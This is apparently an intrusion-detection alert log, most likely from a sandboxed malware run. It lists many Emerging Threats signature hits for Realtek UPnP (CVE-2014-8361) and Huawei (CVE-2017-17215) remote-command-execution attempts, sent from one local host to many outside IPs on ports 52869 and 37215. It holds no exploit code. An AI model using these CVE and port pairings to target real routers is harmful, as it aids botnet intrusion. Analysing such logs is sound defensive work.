                                                07/20/24-23:05:59.333647TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614818652869192.168.2.14123.51.179.219
                                                07/20/24-23:07:03.257276TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25548452869192.168.2.1448.138.205.15
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315037215192.168.2.14216.16.161.149
                                                07/20/24-23:05:42.256029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154837215192.168.2.14200.186.111.219
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091237215192.168.2.14211.249.150.64
                                                07/20/24-23:06:31.352260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4272652869192.168.2.14106.188.225.74
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456437215192.168.2.14123.4.132.228
                                                07/20/24-23:05:39.647017TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3837852869192.168.2.1495.146.229.83
                                                07/20/24-23:05:56.058256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558237215192.168.2.14157.141.242.98
                                                07/20/24-23:06:11.271256TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4286852869192.168.2.1419.179.160.126
                                                07/20/24-23:07:00.185152TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615495452869192.168.2.14209.97.114.205
                                                07/20/24-23:05:57.470552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614586252869192.168.2.1447.88.146.78
                                                07/20/24-23:05:46.454459TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4032252869192.168.2.148.0.192.243
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440437215192.168.2.1441.100.110.197
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821637215192.168.2.14197.174.117.38
                                                07/20/24-23:06:01.791787TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25308452869192.168.2.14165.171.69.137
                                                07/20/24-23:05:58.102253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3792052869192.168.2.1453.49.234.47
                                                07/20/24-23:05:35.717999TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4591452869192.168.2.14131.178.64.107
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409837215192.168.2.1441.188.89.144
                                                07/20/24-23:06:07.499893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491237215192.168.2.14189.101.108.144
                                                07/20/24-23:06:08.268005TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615320652869192.168.2.148.57.21.242
                                                07/20/24-23:06:10.418021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3285852869192.168.2.144.21.2.155
                                                07/20/24-23:07:25.713951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3392252869192.168.2.14110.56.95.238
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577037215192.168.2.14197.14.104.106
                                                07/20/24-23:05:37.601961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24041252869192.168.2.14109.170.180.65
                                                07/20/24-23:05:48.795527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4399437215192.168.2.1441.17.243.43
                                                07/20/24-23:06:02.500189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4084852869192.168.2.1431.89.98.146
                                                07/20/24-23:06:03.235312TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24865852869192.168.2.14161.200.183.56
                                                07/20/24-23:06:05.271056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5244252869192.168.2.14223.121.185.59
                                                07/20/24-23:06:24.162612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5078452869192.168.2.14130.195.197.193
                                                07/20/24-23:05:39.832778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3391252869192.168.2.1495.244.78.147
                                                07/20/24-23:05:56.106041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598037215192.168.2.14170.201.20.31
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459837215192.168.2.145.217.123.52
                                                07/20/24-23:05:37.457748TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23517052869192.168.2.1437.213.85.230
                                                07/20/24-23:05:42.238265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807037215192.168.2.14197.208.46.11
                                                07/20/24-23:06:17.555463TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614879252869192.168.2.1438.39.9.123
                                                07/20/24-23:05:36.032524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613838652869192.168.2.14134.42.80.231
                                                07/20/24-23:05:56.421313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243037215192.168.2.14197.192.81.94
                                                07/20/24-23:06:05.754581TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615013452869192.168.2.1424.118.233.225
                                                07/20/24-23:06:06.546922TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5514852869192.168.2.144.35.177.241
                                                07/20/24-23:05:40.439699TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23497452869192.168.2.14193.5.42.88
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364637215192.168.2.14197.216.248.221
                                                07/20/24-23:06:11.045159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4923452869192.168.2.1473.73.160.90
                                                07/20/24-23:06:19.575886TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615417252869192.168.2.14190.50.4.69
                                                07/20/24-23:05:47.101729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977037215192.168.2.1482.180.170.65
                                                07/20/24-23:06:15.208037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5378852869192.168.2.1449.182.189.186
                                                07/20/24-23:05:35.952301TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615517852869192.168.2.14141.117.5.138
                                                07/20/24-23:06:08.306292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5343052869192.168.2.14147.108.61.100
                                                07/20/24-23:05:57.558741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614189052869192.168.2.14103.66.18.174
                                                07/20/24-23:06:14.916755TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614150252869192.168.2.1437.161.35.44
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4718837215192.168.2.1441.158.13.136
                                                07/20/24-23:06:05.732595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5343252869192.168.2.14199.125.41.58
                                                07/20/24-23:05:42.245949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605237215192.168.2.14197.3.98.125
                                                07/20/24-23:05:38.235364TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4704252869192.168.2.14200.224.172.161
                                                07/20/24-23:05:59.445692TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24370852869192.168.2.1464.167.73.71
                                                07/20/24-23:05:57.820676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613962852869192.168.2.1467.42.219.248
                                                07/20/24-23:05:39.754007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379837215192.168.2.1441.79.135.47
                                                07/20/24-23:05:59.787018TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23623052869192.168.2.1460.161.200.238
                                                07/20/24-23:07:06.347525TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614110252869192.168.2.1450.238.40.216
                                                07/20/24-23:05:48.761105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181237215192.168.2.14157.233.195.92
                                                07/20/24-23:05:39.065904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098837215192.168.2.1441.23.219.80
                                                07/20/24-23:06:02.938370TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23709252869192.168.2.14159.222.72.181
                                                07/20/24-23:06:04.058070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920237215192.168.2.14152.255.113.99
                                                07/20/24-23:06:15.811024TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4015252869192.168.2.14139.35.146.241
                                                07/20/24-23:05:38.525782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4337852869192.168.2.1453.127.213.152
                                                07/20/24-23:05:58.162298TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614403052869192.168.2.1483.147.48.75
                                                07/20/24-23:05:58.983376TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23904452869192.168.2.1498.96.42.253
                                                07/20/24-23:06:00.938217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3727652869192.168.2.14109.194.35.126
                                                07/20/24-23:06:11.280682TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613682452869192.168.2.14133.131.6.20
                                                07/20/24-23:05:44.673284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23450652869192.168.2.14142.243.145.171
                                                07/20/24-23:06:17.501695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4832652869192.168.2.14161.51.22.215
                                                07/20/24-23:06:11.202361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6020052869192.168.2.14177.184.130.121
                                                07/20/24-23:06:20.610603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4838052869192.168.2.14137.15.168.190
                                                07/20/24-23:05:40.347577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5864252869192.168.2.14163.182.5.64
                                                07/20/24-23:06:07.983284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4252652869192.168.2.1431.38.158.120
                                                07/20/24-23:05:59.574335TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5147052869192.168.2.14126.33.182.99
                                                07/20/24-23:05:59.827265TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614885252869192.168.2.14103.96.99.69
                                                07/20/24-23:06:00.746218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25285252869192.168.2.1491.100.67.165
                                                07/20/24-23:06:18.694959TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3707852869192.168.2.1459.105.24.110
                                                07/20/24-23:06:16.332122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5165852869192.168.2.14105.206.141.172
                                                07/20/24-23:05:42.220683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786437215192.168.2.14157.71.60.191
                                                07/20/24-23:06:27.950361TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613859252869192.168.2.14126.106.173.181
                                                07/20/24-23:06:15.174161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615901652869192.168.2.14164.66.171.183
                                                07/20/24-23:05:56.106041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858437215192.168.2.1441.144.136.45
                                                07/20/24-23:05:37.443569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25179452869192.168.2.1414.214.68.156
                                                07/20/24-23:06:13.620376TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473852869192.168.2.14146.93.233.79
                                                07/20/24-23:05:56.137269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796437215192.168.2.1441.51.224.2
                                                07/20/24-23:05:34.657263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5270837215192.168.2.14130.150.233.95
                                                07/20/24-23:06:14.723902TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3853052869192.168.2.1491.87.105.89
                                                07/20/24-23:05:57.179441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5651652869192.168.2.14208.210.138.41
                                                07/20/24-23:06:12.532322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613390452869192.168.2.1494.22.181.218
                                                07/20/24-23:05:57.244491TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5078652869192.168.2.14160.184.86.98
                                                07/20/24-23:06:06.216907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4108052869192.168.2.14182.38.32.134
                                                07/20/24-23:06:01.256977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614520052869192.168.2.1494.132.77.54
                                                07/20/24-23:06:34.148721TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613788452869192.168.2.14148.38.185.25
                                                07/20/24-23:05:48.876892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3873237215192.168.2.14157.47.128.125
                                                07/20/24-23:05:35.936014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4763452869192.168.2.14202.183.171.29
                                                07/20/24-23:05:36.526908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112437215192.168.2.1441.202.249.78
                                                07/20/24-23:06:00.191114TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23564452869192.168.2.14146.125.220.156
                                                07/20/24-23:06:01.813206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5195452869192.168.2.1491.100.67.165
                                                07/20/24-23:06:08.296284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5641852869192.168.2.14133.5.180.131
                                                07/20/24-23:06:02.993689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4458652869192.168.2.14184.55.125.60
                                                07/20/24-23:05:57.417957TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25826452869192.168.2.1490.174.188.55
                                                07/20/24-23:05:35.812828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5995652869192.168.2.14132.39.168.140
                                                07/20/24-23:05:57.342606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5866852869192.168.2.14112.83.97.45
                                                07/20/24-23:06:13.552295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5631252869192.168.2.14199.163.241.170
                                                07/20/24-23:05:36.324397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099837215192.168.2.14157.116.93.101
                                                07/20/24-23:05:37.458829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3598452869192.168.2.1448.191.112.200
                                                07/20/24-23:06:02.853581TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25225652869192.168.2.14119.157.54.136
                                                07/20/24-23:05:59.449442TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24289452869192.168.2.14161.224.19.168
                                                07/20/24-23:05:57.598746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3823052869192.168.2.14200.129.145.85
                                                07/20/24-23:05:57.706627TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615754852869192.168.2.14123.96.193.240
                                                07/20/24-23:05:57.816478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3936852869192.168.2.1498.44.175.48
                                                07/20/24-23:05:36.324298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079437215192.168.2.14197.125.130.118
                                                07/20/24-23:06:25.803945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5424652869192.168.2.14210.91.190.210
                                                07/20/24-23:06:07.530370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3888452869192.168.2.14115.151.82.228
                                                07/20/24-23:05:36.577316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414237215192.168.2.14144.175.143.141
                                                07/20/24-23:05:33.828884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759437215192.168.2.14197.209.199.16
                                                07/20/24-23:06:58.705456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5783052869192.168.2.1471.172.2.131
                                                07/20/24-23:05:37.458829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25662452869192.168.2.14141.117.5.138
                                                07/20/24-23:07:36.969912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23882052869192.168.2.14173.194.24.204
                                                07/20/24-23:06:23.241818TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615978652869192.168.2.1484.20.95.181
                                                07/20/24-23:05:48.876892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5334237215192.168.2.14197.190.111.69
                                                07/20/24-23:05:58.378138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5919852869192.168.2.1432.171.130.180
                                                07/20/24-23:06:17.536920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5322652869192.168.2.14100.0.21.245
                                                07/20/24-23:05:35.740389TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614299852869192.168.2.14123.111.19.233
                                                07/20/24-23:05:39.470987TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613910052869192.168.2.14107.127.41.70
                                                07/20/24-23:05:33.863090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5997637215192.168.2.14121.209.116.212
                                                07/20/24-23:05:36.592874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447237215192.168.2.14191.91.41.96
                                                07/20/24-23:05:40.365973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23457852869192.168.2.14172.234.119.46
                                                07/20/24-23:05:35.409925TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615691452869192.168.2.145.221.237.47
                                                07/20/24-23:05:35.294828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3427652869192.168.2.14117.129.252.99
                                                07/20/24-23:05:38.666608TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614075852869192.168.2.14146.54.173.69
                                                07/20/24-23:05:59.919897TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24535852869192.168.2.14196.190.254.156
                                                07/20/24-23:06:03.476247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851437215192.168.2.14149.206.215.202
                                                07/20/24-23:06:58.705456TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23588852869192.168.2.14194.174.131.9
                                                07/20/24-23:06:37.923474TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613362652869192.168.2.14109.129.31.96
                                                07/20/24-23:05:57.032993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5445852869192.168.2.1484.68.245.96
                                                07/20/24-23:06:06.402808TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615515452869192.168.2.1484.52.21.90
                                                07/20/24-23:06:01.856452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4602052869192.168.2.1492.24.43.126
                                                07/20/24-23:05:58.965682TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6011052869192.168.2.14100.53.98.16
                                                07/20/24-23:05:37.449834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25170652869192.168.2.14185.138.94.75
                                                07/20/24-23:05:57.159827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5422652869192.168.2.14102.163.53.206
                                                07/20/24-23:05:36.272821TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614629652869192.168.2.14216.11.155.229
                                                07/20/24-23:05:45.694473TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616096052869192.168.2.1472.109.105.60
                                                07/20/24-23:05:52.544570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3585252869192.168.2.14211.43.222.47
                                                07/20/24-23:06:40.117305TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615040852869192.168.2.14103.128.148.32
                                                07/20/24-23:05:57.214918TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615999852869192.168.2.1486.91.56.112
                                                07/20/24-23:06:03.066444TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615380252869192.168.2.14179.38.138.95
                                                07/20/24-23:06:13.646796TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23282852869192.168.2.1459.102.173.92
                                                07/20/24-23:06:14.583817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615066652869192.168.2.1427.157.237.238
                                                07/20/24-23:05:39.678174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365837215192.168.2.14157.205.67.171
                                                07/20/24-23:05:57.437168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5594452869192.168.2.1437.248.27.96
                                                07/20/24-23:05:56.960851TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613547652869192.168.2.14209.32.151.5
                                                07/20/24-23:05:50.576749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639837215192.168.2.14157.237.74.87
                                                07/20/24-23:06:30.760053TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24252852869192.168.2.14154.174.220.159
                                                07/20/24-23:05:59.457721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5689852869192.168.2.14175.190.32.228
                                                07/20/24-23:05:52.545166TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23525052869192.168.2.14101.8.57.23
                                                07/20/24-23:05:38.905402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4613852869192.168.2.14190.0.225.28
                                                07/20/24-23:05:40.446932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4704452869192.168.2.1489.172.236.176
                                                07/20/24-23:05:52.544972TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5733052869192.168.2.1414.188.62.21
                                                07/20/24-23:05:57.152960TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25716052869192.168.2.14121.202.104.123
                                                07/20/24-23:05:36.310523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4816052869192.168.2.1439.176.203.73
                                                07/20/24-23:05:45.284179TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614009052869192.168.2.14223.161.15.138
                                                07/20/24-23:05:52.615827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4287852869192.168.2.14191.106.159.193
                                                07/20/24-23:05:58.662427TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3998052869192.168.2.14210.197.231.89
                                                07/20/24-23:06:02.474846TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5082652869192.168.2.14118.21.82.230
                                                07/20/24-23:06:13.684507TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613761052869192.168.2.14206.146.161.64
                                                07/20/24-23:06:01.465127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4591252869192.168.2.14150.243.199.82
                                                07/20/24-23:06:04.419011TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4373652869192.168.2.14190.112.31.150
                                                07/20/24-23:06:09.547041TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24650652869192.168.2.14103.249.11.195
                                                07/20/24-23:05:47.120793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826237215192.168.2.1441.189.186.102
                                                07/20/24-23:05:52.488878TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23907052869192.168.2.14120.185.72.185
                                                07/20/24-23:05:59.045966TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3414652869192.168.2.14145.135.164.39
                                                07/20/24-23:05:45.437584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052637215192.168.2.14177.224.66.232
                                                07/20/24-23:06:32.857938TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3305052869192.168.2.14219.6.222.246
                                                07/20/24-23:05:48.808887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054037215192.168.2.1441.180.40.88
